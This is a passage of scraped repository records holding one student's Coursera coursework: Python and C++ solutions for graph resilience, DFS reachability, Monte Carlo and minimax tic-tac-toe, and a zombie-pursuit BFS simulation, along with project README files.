graph m = 2')\nplt.title('Graph resilience comparision for targeted order')\nplt.xlabel('number of nodes removed')\nplt.ylabel('size of the largest connected component')\nplt.legend(loc = 'upper right')\nplt.xlim(0, None)\nplt.ylim(0, 1400)\nplt.grid()\nplt.show()\n# uncommet to save the plot \n#plt.savefig(\"Q4_graph_resilience_comparision.png\")\n\n##### Q5 Solution #####\n# Examine the shape of the three curves from your plot in Question 4. \n# Which of the three graphs are resilient under targeted attacks as \n# the first 20% of their nodes are removed? Again, note that there is \n# no need to compare the three curves against each other in your answer \n# to this question.\n#\n# Ans: From the graph we can see that only ER graph is resilient as the \n# first 20% of the nodes are removed while the UPA and the computer\n# network graph reaches close to zero as 20% of the ndoes are removed\n"
},
{
"alpha_fraction": 0.8030231595039368,
"alphanum_fraction": 0.8101086616516113,
"avg_line_length": 210.8000030517578,
"blob_id": "923ee98e7486a75070f25e673e853bd337285879",
"content_id": "0f5d3ca429d1c36a9259e827e0392f8331313c2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2117,
"license_type": "no_license",
"max_line_length": 1098,
"num_lines": 10,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 2)/Mini-Project7 Spaceship/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #7 - Spaceship\n\nImplemented a simple version of the classic arcade game Asteroids in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_dC7ba6vMF6_12.py) and press the play button on the top left corner. This mini-project only implements part of the game including features to control the spaceship, fire missiles and spawn one rock. The next mini-project completes the game to allow for rock explosion and animations with space ship missiles, update the lives that the player has after collision with the rocks, spawn numerous rocks and other minor features.\n\nTo navigate the spaceship use the arrow keys and to fire missiles use the spacebar. Only one missile can be fired and it will not die down.\n\nMini-project overview taken from course page can be found below:\n* In our last two mini-projects, we will build a 2D space game RiceRocks that is inspired by the classic arcade game Asteroids (1979). Asteroids is a relatively simple game by today's standards, but was still immensely popular during its time. In the game, the player controls a spaceship via four buttons: two buttons that rotate the spaceship clockwise or counter clockwise (independent of its current velocity), a thrust button that accelerates the ship in its forward direction and a fire button that shoots missiles. Large asteroids spawn randomly on the screen with random velocities.The player's goal is to destroy these asteroids before they strike the player's ship. In the arcade version, a large rock hit by a missile split into several fast moving small asteroids that themselves must be destroyed. Occasionally, a flying saucer also crosses the screen and attempts to destroy the player's spaceship. Searching for \"asteroids arcade\" yields links to multiple versions of Asteroids that are available on the web (including an updated version by Atari, the original creator of Asteroids).\n\nComplete Mini-Project Description can be found at: <https://www.coursera.org/learn/interactive-python-2/supplement/2ZVsF/mini-project-description>"
},
{
"alpha_fraction": 0.7987987995147705,
"alphanum_fraction": 0.8054053783416748,
"avg_line_length": 91.55555725097656,
"blob_id": "3e1ab6b0d116da600b9bfe2e10bf28e685caa10c",
"content_id": "33dd8e28e68e54f384500f7515dc8a29af9948ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1665,
"license_type": "no_license",
"max_line_length": 699,
"num_lines": 18,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 2)/Module 3/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Project and Application Overviews\n## Project #3: Closest Pairs and Clustering Algorithm\n\n* For the Project and Application portion of Module 3, you will implement and assess two methods for clustering data. For Project 3, you will also implement two methods for [computing closest pairs](https://storage.googleapis.com/codeskulptor-alg/pdf/ClosestPair.pdf) and [two methods for clustering data](https://storage.googleapis.com/codeskulptor-alg/pdf/Clustering.pdf). In Application 3, you will then compare these two clustering methods in terms of efficiency, automation, and quality. We suggest that you review [this handout](https://storage.googleapis.com/codeskulptor-alg/pdf/ClosestPairsAndClustering.pdf) with the pseudo-code for the methods that you will implement before your proceed.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/algorithmic-thinking-2/supplement/wwmnE/project-3-description>\n\n## Application #3: Comparison of Clustering Algorithms\n\n* In Project 3, you implemented two methods for clustering sets of data. In this Application, we will analyze the performance of these two methods on various subsets of our county-level cancer risk data set. In particular, we will compare these two clustering methods in three areas:\n\n * Efficiency - Which method computes clusterings more efficiently?\n * Automation - Which method requires less human supervision to generate reasonable clusterings?\n * Quality - Which method generates clusterings with less error?.\n\nComplete application description can be found at : \n<https://www.coursera.org/learn/algorithmic-thinking-2/supplement/i0HYj/application-3-description>"
},
{
"alpha_fraction": 0.5381453633308411,
"alphanum_fraction": 0.567685604095459,
"avg_line_length": 29.958677291870117,
"blob_id": "6de73db4a184bdbc7cc6d1652af1fb710da878fb",
"content_id": "7849dd0c90c9c0ceac9a673f0d071e32998bc629",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3903,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 121,
"path": "/Algorithms on Graphs/Assignment1/reach.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: reach.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-01\r\n// description: Problem 1 of the first assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n//\t\t\t\tThe task was : Given an undirected graph and two distinct vertices u and v, \r\n//\t\t\t\tcheck if there is a path between u and v\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\treach function and testing had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all 20 test on Coursera with\r\n//\t\t\t\tmax time used: 0.01/1.00 sec, max memory used: 7.73/512 MB. \r\n\r\n#include <iostream>\r\n#include <vector>\r\n\r\nusing std::vector;\r\n\r\n// Recursively computes whether a path exists between x and y using depth first search\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e3; 0 ≤ x, y ≤ adj.size()-1; x != y\r\n// POST: returns 1 for path between x and y, 0 otherwise\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and 2*m edges where n is adj.size() \r\n// visited = keeps track of all the vertices that have already been visited\r\n// x = one of the vertice of adj\r\n// y = another vertice of adj not equal to x\r\n\r\nint reach(vector<vector<int> > &adj, vector<bool> visited, int x, int y) {\r\n\r\n\tint value = 0;\r\n\r\n\tvisited[x] = true; // mark the first vertice as true\r\n\r\n\t// iterate for all edges of x\r\n\tfor (vector<int>::size_type v = 0; v < adj[x].size(); v++) {\r\n\r\n\t\tif (visited[adj[x][v]] == false) {\r\n\t\t\tif (adj[x][v] == y) // if the target vertice y is connected to the edge from x, return 1\r\n\t\t\t\treturn 1;\r\n\r\n\t\t\telse {\r\n\t\t\t\tvalue = reach(adj, visited, adj[x][v], y); // perform a depth first search with new x value\r\n\t\t\t\tif (value == 1) // if x = y during the depth first search, return 1.\r\n\t\t\t\t\treturn 1;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\r\n\treturn value;\r\n}\r\n\r\nint main() {\r\n\r\n\t// Few test case to check if the reach function works. These are commented since the \r\n\t// assignment requires the reach.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/**************************************************************************************\r\n\r\n\tint n = 8;\r\n\tvector<bool> visited(n, false);\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\r\n\r\n\tadj[4 - 1].push_back(1 - 1);\r\n\tadj[1 - 1].push_back(4 - 1);\r\n\tadj[1 - 1].push_back(2 - 1);\r\n\tadj[2 - 1].push_back(1 - 1);\r\n\r\n\tadj[1 - 1].push_back(3 - 1);\r\n\tadj[3 - 1].push_back(1 - 1);\r\n\r\n\tadj[3 - 1].push_back(4 - 1);\r\n\tadj[4 - 1].push_back(3 - 1);\r\n\r\n\tadj[7 - 1].push_back(8 - 1);\r\n\tadj[8 - 1].push_back(7 - 1);\r\n\r\n\t//test Case 1: No neighbours in adjacency list for both nodes\r\n\tif (reach(adj, visited, 5-1, 6-1 ) != 0) {\r\n\tstd::cout << \"Test case 1 failed\" << std::endl;\r\n\t}\r\n\r\n\t//test Case 2: No egde between the two nodes but the nodes have some neighbours\r\n\tif (reach(adj, visited, 7 - 1, 2 - 1) != 0) {\r\n\tstd::cout << \"Test case 2 failed\" << std::endl;\r\n\t}\r\n\r\n\t//test Case 3: a direct edge connecting the two nodes\r\n\tif (reach(adj, visited, 3 - 1, 1 - 1) != 1) {\r\n\tstd::cout << \"Test case 3 failed\" << std::endl;\r\n\t}\r\n\r\n\t//test Case 4: an indirect path connecting the two nodes\r\n\tif (reach(adj, visited, 4 - 1, 2 - 1) != 1) {\r\n\tstd::cout << \"Test case 4 failed\" << std::endl;\r\n\t}\r\n\r\n\tsystem(\"PAUSE\");\r\n\r\n\t**************************************************************************************/\r\n\t// The code below was mostly provided as a part of the starter file for the assignment with few modifications\r\n\r\n\tsize_t n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector<bool> visited(n, false);\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tfor (size_t i = 0; i < m; i++) {\r\n\t\tint x, y;\r\n\t\tstd::cin >> x >> y;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t\tadj[y - 1].push_back(x - 1);\r\n\t}\r\n\tint x, y;\r\n\tstd::cin >> x >> y;\r\n\tstd::cout << reach(adj, visited, x - 1, y - 1) << std::endl;\r\n\r\n\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6356759071350098,
"alphanum_fraction": 0.6398566365242004,
"avg_line_length": 39.837398529052734,
"blob_id": "13d9dd0466c6814d8bcbab396329f09b0ee0fb71",
"content_id": "408c91461b315d3324e0c9dd3c29fe6b8d2ad798",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5023,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 123,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project3 Tic-Tac-Toe(Monte Carlo)/tic_tac_toe.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nMonte Carlo Tic-Tac-Toe Player\n\"\"\"\nimport random\nimport poc_ttt_gui\nimport poc_ttt_provided as provided\n\n# Constants for Monte Carlo simulator\n# You may change the values of these constants as desired, but\n# do not change their names.\nNTRIALS = 50 # Number of trials to run\nSCORE_CURRENT = 1.0 # Score for squares played by the current player\nSCORE_OTHER = 1.0 # Score for squares played by the other player\nGAME_IN_PROG = None\nGAME_OVER = -1\n \n# Add your functions here.\ndef mc_trial(board, player):\n \"\"\"\n Takes the current game board and the next player to move.\n Plays a game starting with the given player by making\n random moves. the function should modify the board input.\n \"\"\"\n # while game is in progress\n while (board.check_win() == GAME_IN_PROG):\n # get a list of empty spots on the current game board\n avail_spots = board.get_empty_squares()\n # randomly select the spots from the empty board\n sel_spot_idx = random.randrange(0,len(avail_spots))\n # get the row and column of selected spot\n row = avail_spots[sel_spot_idx][0]\n col = avail_spots[sel_spot_idx][1]\n # place the current player on the spot found on the board\n board.move(row, col, player)\n # switch the player\n player = provided.switch_player(player)\n \n \ndef mc_update_scores(scores, board, player):\n \"\"\"\n Takes a grid of scores (a list of lists) with the same \n dimensions as the Tic-Tac-Toe board, a board from a completed \n game, and which player the machine player is. It then scores \n the completed board and update the scores grid. \n \"\"\"\n if (board.check_win() != provided.DRAW):\n if (player == board.check_win()):\n # set increment score to positive\n incr_score = 1\n else:\n # set incrment score to negative\n incr_score = -1\n\n # iterate over the board\n for row in range(board.get_dim()):\n for col in range(board.get_dim()):\n\n if (player == board.square(row, col)):\n scores[row][col] += (incr_score * SCORE_CURRENT)\n elif (board.square(row, col) != provided.EMPTY):\n scores[row][col] += (-incr_score * SCORE_CURRENT)\n\ndef get_best_move(board, scores): \n \"\"\"\n Takes a current board and a grid of scores and returns the (row, col) \n of empty square with the maximum score, randomly return one in case of\n more then one maximum score. Returns none if no empty square is present\n \"\"\"\n # get the locations of empty squares on the game board\n avail_spots = board.get_empty_squares()\n # if not spots available print message and return\n if len(avail_spots) == 0:\n print \"no empty squares available\"\n return \n \n # intialize the max score value to be the value of the first available\n # empty square in the list of empty squares\n max_val = scores[avail_spots[0][0]][avail_spots[0][1]]\n # iterate over all available empty squares and update the max score \n for row, col in avail_spots:\n if scores[row][col] > max_val:\n max_val = scores[row][col]\n \n # store all other occurances of max score if any \n max_val_locs = [(row, col) for row, col in avail_spots \n if max_val == scores[row][col]]\n \n # return either the location of max score or a randomly selected location\n # if more than 1 occurances of max score are present\n return max_val_locs[random.randrange(0, len(max_val_locs))]\n \ndef mc_move(board, player, trials):\n \"\"\"\n Takes a current board, which player the machine player \n is, and the number of trials to run. Uses the \n Monte Carlo simulation to return a move for the\n machine player in the form of a (row, column)\n \"\"\"\n # check to see if current game is in progress\n if (board.check_win() == GAME_IN_PROG):\n # initialize a list of lists of all zero values and same dimension\n # as the board\n scores = [[0] * board.get_dim() for dummy_num in range(board.get_dim())]\n for dummy_trial in range(trials):\n # clone the current board configuration to be used for all trials of\n # Monte Carlo(MC) simulation since the MC function mutates the board\n # configuration after MC completion\n board_copy = board.clone()\n # run the MC simulation on a copy of the current board configuration\n mc_trial(board_copy, player)\n # update the scores based on the simulation results\n mc_update_scores(scores, board_copy, player)\n\n return get_best_move(board, scores)\n else:\n print \"Game has already concluded !\"\n\n\n## Test game with the console or the GUI. Uncomment whichever \n## you prefer. Both should be commented out when you submit \n## for testing to save time.\n# provided.play_game(mc_move, NTRIALS, False) \npoc_ttt_gui.run_gui(3, provided.PLAYERX, mc_move, NTRIALS, False)\n"
},
{
"alpha_fraction": 0.7850877046585083,
"alphanum_fraction": 0.7926065325737,
"avg_line_length": 113,
"blob_id": "d632db152fe43cdc02126412c13017a0379a6319",
"content_id": "f7e424ba2fcd3d2412ac6d95aff301f397535d0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1596,
"license_type": "no_license",
"max_line_length": 534,
"num_lines": 14,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project2 Word Wrangler/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #2 Word Wrangler\n\nImplemented the game logic and other helper functions for Word Wrangler game in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game, click [here](http://www.codeskulptor.org/#user46_5gpKzUvHYk_75.py) and press the play button on the top left corner. A window will pop up. The game can then be played by typing in a new word and based on the letters of this word, other words are be guessed.\n\nLink to my test suite for the game logic:\n<http://www.codeskulptor.org/#user46_mxRfawLIbQ_5.py>\n\nMini-project overview taken from course page can be found below:\n* In this mini-project we will create a simple word game. The game will take an input word and then generate all valid words that can be created using the letters in the input word. You will then play the game by guessing all of the words. The objective of this mini-project is to work with ordered lists and recursion. While it is possible to write the functions in other ways, we strongly encourage you to follow the spirit of the mini-project. The only way to become more comfortable with recursion is to write recursive functions!\n\n* We have provided a working GUI and a class to manage the state of the game. You will be responsible for writing several helper functions. These functions will be used by the provided code in order to build the list of valid words that are composed of letters from the input word.\n\nComplete project description can be found at: \n<https://www.coursera.org/learn/principles-of-computing-2/supplement/xl26r/mini-project-description>\n"
},
{
"alpha_fraction": 0.7521428465843201,
"alphanum_fraction": 0.7742857336997986,
"avg_line_length": 126.2727279663086,
"blob_id": "f0f3a829da8bfc787e171413d80cbe1bb4db5463",
"content_id": "155381ae4b5364eb6eb61a060843f3b313883236",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1400,
"license_type": "no_license",
"max_line_length": 557,
"num_lines": 11,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project2 Game 2048/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #2 - 2048(Full)\n\nImplemented the 2048 game logic in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_iYjoTGs3rX_51.py) and press the play button on the top left corner. \n\nMini-project overview taken from course page can be found below:\n* For this assignment, your task is to complete the implementation of a version of the 2048 game. Since we will provide a graphical user interface for the game, your task is to implement the game logic in terms of a **TwentyFortyEight** class in Python. Although the original game is played on a <a href=\"https://www.codecogs.com/eqnedit.php?latex=4&space;\\times&space;4\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?4&space;\\times&space;4\" title=\"4 \\times 4\" /></a> grid, your version should be able to have an arbitrary height and width.\n\n* We have provided the following [template](http://www.codeskulptor.org/#poc_2048_template.py) that contains an outline of the **TwentyFortyEight** class. The signature (name and parameters) of the functions, classes, and methods in this file must remain unchanged, but you may add any additional functions, methods, or other code that you need to.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/principles-of-computing-1/supplement/L0L0Y/mini-project-description>\n"
},
{
"alpha_fraction": 0.5425457954406738,
"alphanum_fraction": 0.5571528077125549,
"avg_line_length": 50.95783233642578,
"blob_id": "9c5ba8f9e7eb787d1d5233ff645a1db599a47b88",
"content_id": "01bc1b1e0078ca0e952739dcec2470c9a3022eb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8626,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 166,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project3 Tic-Tac-Toe(Minimax)/tic_tac_toe_minimax_testsuite.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTesting suite for functions used in one implementation\nof Mini-max Tic-Tac-Toe player\n\"\"\"\nimport poc_simpletest as simpletest\nimport user46_NHM1TTnSvs_129 as ttt_minimax\nimport poc_ttt_provided as provided\n\n\nimport codeskulptor\ncodeskulptor.set_timeout(60)\n\n\nclass TestTicTacToeMinimax():\n \"\"\"\n function that tests the mm_move function\n of the Tic-Tac-Toe game with minimax mini-project\n \"\"\"\n def test_mm_move(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running mm_move function test...\"\n\n # Test #1.1: check the base case for when the game is drawn and\n # no more legal moves are left\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERO, provided.PLAYERX, provided.PLAYERO],\n [provided.PLAYERO, provided.PLAYERX, provided.PLAYERO],\n [provided.PLAYERX, provided.PLAYERO, provided.PLAYERX]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERX)\n exp_move = (0, (-1, -1))\n # run the Test #1.1 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.1: mm_move\")\n\n # Test #1.2: check the base case for when PLAYERX has won and no more\n # legal moves are left\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERO, provided.PLAYERX, provided.PLAYERX],\n [provided.PLAYERO, provided.PLAYERX, provided.PLAYERO],\n [provided.PLAYERX, provided.PLAYERO, provided.PLAYERX]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERX)\n exp_move = (1, (-1, -1))\n # run the Test #1.3 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.2: mm_move\")\n \n # Test #1.3: check the base case for when PLAYERX has lost and no more\n # legal moves are left\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERO, provided.PLAYERX, provided.PLAYERO],\n [provided.PLAYERO, provided.PLAYERX, provided.PLAYERO],\n [provided.PLAYERO, provided.PLAYERO, provided.PLAYERX]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERX)\n exp_move = (-1, (-1, -1))\n # run the Test #1.3 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.3: mm_move\")\n \n # Test #1.4: check the case when only one move is left, and choosing\n # results in PLAYERX winning\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERO, provided.PLAYERX, provided.PLAYERX],\n [provided.PLAYERO, provided.PLAYERX, provided.PLAYERO],\n [provided.EMPTY, provided.PLAYERO, provided.PLAYERX]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERX)\n exp_move = (1, (2, 0))\n # run the Test #1.4 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.4: mm_move\")\n \n # Test #1.5: check the case when only two moves are left, and PLAYERO\n # minimizes its score so that it wins\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERO, provided.PLAYERX, provided.PLAYERX],\n [provided.PLAYERO, provided.PLAYERX, provided.EMPTY],\n [provided.EMPTY, provided.PLAYERO, provided.PLAYERX]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERO)\n exp_move = (-1, (2, 0))\n # run the Test #1.5 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.5: mm_move\")\n \n # Test #1.6: check the case when two moves are left and the PLAYERO\n # minimizes to draw the game\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERO, provided.PLAYERX, provided.EMPTY],\n [provided.PLAYERO, provided.PLAYERX, provided.EMPTY],\n [provided.PLAYERX, provided.PLAYERO, provided.PLAYERX]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERO)\n exp_move = (0, (0, 2))\n # run the Test #1.6 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.6: mm_move\")\n \n # Test #1.7: check to see if PLAYERO chooses the correct move\n # that will result in a draw\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERO, provided.PLAYERX, provided.EMPTY],\n [provided.PLAYERO, provided.PLAYERX, provided.EMPTY],\n [provided.EMPTY, provided.PLAYERO, provided.PLAYERX]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERX)\n exp_move = (0, (2, 0))\n # run the Test #1.7 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.7: mm_move\")\n \n \n # Test #1.8: test another board configuration for the draw vs loss for PLAYERO\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERX, provided.PLAYERO, provided.PLAYERX], \n [provided.PLAYERX, provided.PLAYERO, provided.PLAYERO], \n [provided.EMPTY, provided.PLAYERX, provided.EMPTY]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERO)\n exp_move = (0, (2, 0))\n # run the Test #1.8 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.8: mm_move\")\n\n\n # Test #1.9: test another board configuration for the draw vs loss for PLAYERO\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERX, provided.PLAYERX, provided.PLAYERO],\n [provided.PLAYERO, provided.PLAYERX, provided.PLAYERX],\n [provided.EMPTY, provided.EMPTY, provided.PLAYERO]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERO)\n exp_move = (0, (2, 1))\n # run the Test #1.9 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.9: mm_move\")\n \n # Test #1.10: test to see if we get the correct score for a 2 by 2\n # board. Since PLAYERX made the first move, current player, PLAYERO\n # will lose no matter what move is selected. Thus, score should be 1\n board = provided.TTTBoard(2, False,\n [[provided.PLAYERX, provided.EMPTY],\n [provided.EMPTY, provided.EMPTY]])\n actual_score = ttt_minimax.mm_move(board, provided.PLAYERO)[0]\n exp_score = 1\n # run the Test #1.10 and compare the expected vs actual output\n suite.run_test(str(actual_score), str(exp_score), \n \"Test #1.10: mm_move\")\n\n\n # Test #1.11: Test the case for a game that just started i.e.\n # the board is empty except for the first move. Since both\n # player are minimzing their losses, it will result in a draw.\n # Therefore, we should get a score of 0\n board = provided.TTTBoard(3, False, \n [[provided.EMPTY, provided.EMPTY, provided.PLAYERX], \n [provided.EMPTY, provided.EMPTY, provided.EMPTY], \n [provided.EMPTY, provided.EMPTY, provided.EMPTY]])\n actual_score = ttt_minimax.mm_move(board, provided.PLAYERO)[0]\n exp_score = 0\n # run the Test #1.11 and compare the expected vs actual output\n suite.run_test(str(actual_score), str(exp_score), \n \"Test #1.11: mm_move\")\n\n # report number of tests and failures\n suite.report_results()\n print \n \n# test all functions of the word wangler pini-project\nminimax_sim = TestTicTacToeMinimax()\nminimax_sim.test_mm_move()\n\n"
},
{
"alpha_fraction": 0.5394195318222046,
"alphanum_fraction": 0.544834315776825,
"avg_line_length": 38.4487190246582,
"blob_id": "7a919df30ed67b5a30a184cc421973e300db0c89",
"content_id": "0a45704a3df3dd4de7c93300b9890973f208ea64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9234,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 234,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project1 Zombie Apocalypse/zombie_apocalypse.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nStudent portion of Zombie Apocalypse mini-project\n\"\"\"\n\nimport random\nimport poc_grid\nimport poc_queue\nimport poc_zombie_gui\n\n# global constants\nEMPTY = 0 \nFULL = 1\nFOUR_WAY = 0\nEIGHT_WAY = 1\nOBSTACLE = 5\nHUMAN = 6\nZOMBIE = 7\n\n\nclass Apocalypse(poc_grid.Grid):\n \"\"\"\n Class for simulating zombie pursuit of human on grid with\n obstacles\n \"\"\"\n\n def __init__(self, grid_height, grid_width, obstacle_list = None, \n zombie_list = None, human_list = None):\n \"\"\"\n Create a simulation of given size with given obstacles,\n humans, and zombies\n \"\"\"\n poc_grid.Grid.__init__(self, grid_height, grid_width)\n if obstacle_list != None:\n for cell in obstacle_list:\n self.set_full(cell[0], cell[1])\n if zombie_list != None:\n self._zombie_list = list(zombie_list)\n else:\n self._zombie_list = []\n if human_list != None:\n self._human_list = list(human_list) \n else:\n self._human_list = []\n \n def clear(self):\n \"\"\"\n Set cells in obstacle grid to be empty\n Reset zombie and human lists to be empty\n \"\"\"\n # clear all grid cell to be passable i.e. cell that\n # are EMPTY\n poc_grid.Grid.clear(self)\n # reinitialize the human and zombie lists to\n # be empty\n self._human_list = []\n self._zombie_list = []\n \n \n def add_zombie(self, row, col):\n \"\"\"\n Add zombie to the zombie list\n \"\"\"\n self._zombie_list.append((row,col))\n \n def num_zombies(self):\n \"\"\"\n Return number of zombies\n \"\"\"\n return len(self._zombie_list) \n \n def zombies(self):\n \"\"\"\n Generator that yields the zombies in the order they were\n added.\n \"\"\"\n for zombie in self._zombie_list:\n yield zombie\n \n\n def add_human(self, row, col):\n \"\"\"\n Add human to the human list\n \"\"\"\n self._human_list.append((row,col))\n \n def num_humans(self):\n \"\"\"\n Return number of humans\n \"\"\"\n return len(self._human_list)\n \n def humans(self):\n \"\"\"\n Generator that yields the humans in the order they were added.\n \"\"\"\n for human in self._human_list:\n yield human\n \n def compute_distance_field(self, entity_type):\n \"\"\"\n Function computes and returns a 2D distance field\n Distance at member of entity_list is zero\n Shortest paths avoid obstacles and use four-way distances\n \"\"\"\n # store the height and width of the grid\n height = poc_grid.Grid.get_grid_height(self)\n width = poc_grid.Grid.get_grid_width(self)\n # create a grid that tracks the visited cells of the grid\n # and intialize all locations to be EMPTY i.e. not visited\n visited = [[EMPTY for dummy_col in range(width)] \n for dummy_row in range(height)]\n \n # create a distance field to keep track of the shortest\n # distance from a entity type and initialize it as height*width\n # since the distance larger than any possible distance\n distance_field = [[height * width for dummy_col in range(width)] \n for dummy_row in range(height)]\n \n # create a queue for breath first search\n boundary = poc_queue.Queue()\n # map the respective entity type to its generator function\n map_entity_type = {HUMAN: self.humans, ZOMBIE: self.zombies}\n # add all human or zombie locations to the queue \n # and mark those locations as visited and the\n # distance at that location as zero\n for row, col in map_entity_type[entity_type]():\n boundary.enqueue((row, col))\n visited[row][col] = FULL\n distance_field[row][col] = 0\n # begin the breath first search\n while(len(boundary) > 0 ):\n # get the current cell i.e the grid location\n # of the zombie/human\n current_cell = boundary.dequeue()\n # get all of the current cells four neighbours and iterate\n # over them\n for neighbor_cell in poc_grid.Grid.four_neighbors(self, \n current_cell[0], \n current_cell[1]):\n # if neigboring cell is passable and has not yet been visited\n # add it to the queue for BFS, mark it as visited and \n # update the distance. \n if (poc_grid.Grid.is_empty(self, neighbor_cell[0], neighbor_cell[1]) \n and visited[neighbor_cell[0]][neighbor_cell[1]] == EMPTY):\n boundary.enqueue(neighbor_cell)\n visited[neighbor_cell[0]][neighbor_cell[1]] = FULL\n distance_field[neighbor_cell[0]][neighbor_cell[1]] = (\n distance_field[current_cell[0]][current_cell[1]] + 1)\n \n return distance_field\n \n def move_humans(self, zombie_distance_field):\n \"\"\"\n Function that moves humans away from zombies, diagonal moves\n are allowed\n \"\"\"\n # initialize the list that stores the new location of the \n # humans after each step of the simulation\n new_human_locs = []\n # iterate over all human locations using it's generator\n for human in self.humans():\n # initialize the maximum distance that the human\n # can travel after each step of simulation as\n # the current human location\n max_dis = zombie_distance_field[human[0]][human[1]]\n # store the location of this distance that maximizes\n # its location from the nearest zombie\n safest_loc = human\n # get all 8 neighboring cell of this current human \n neighbors = poc_grid.Grid.eight_neighbors(self, \n human[0], human[1])\n # iterate over all neigboring cells to find which \n # neigboring cell maximizes the current human's\n # distance from the nearest zombie\n for neighbor in neighbors:\n if (poc_grid.Grid.is_empty(self, \n neighbor[0], \n neighbor[1]) \n and zombie_distance_field[neighbor[0]][neighbor[1]] > max_dis):\n max_dis = zombie_distance_field[neighbor[0]][neighbor[1]]\n safest_loc = neighbor\n \n # store this location that maximizes current human's\n # distance from the nearest zombie\n new_human_locs += [safest_loc]\n # update the existing human locations list with the new humans\n # locations found earlier\n self._human_list = new_human_locs\n\n \n def move_zombies(self, human_distance_field):\n \"\"\"\n Function that moves zombies towards humans, no diagonal moves\n are allowed\n \"\"\"\n # initialize the list that stores the new location of the \n # zombie after each step of the simulation \n 